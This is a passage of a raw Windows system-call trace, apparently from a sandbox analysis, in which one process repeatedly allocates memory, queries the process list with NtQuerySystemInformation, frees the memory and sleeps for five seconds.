ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.544] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.560] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.575] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.591] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.607] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.623] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.638] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.675] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.684] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.700] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.717] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.732] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.775] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.794] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.809] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.826] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.841] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.856] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.871] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.890] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0121.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0121.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0121.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0121.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0121.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0121.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0121.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 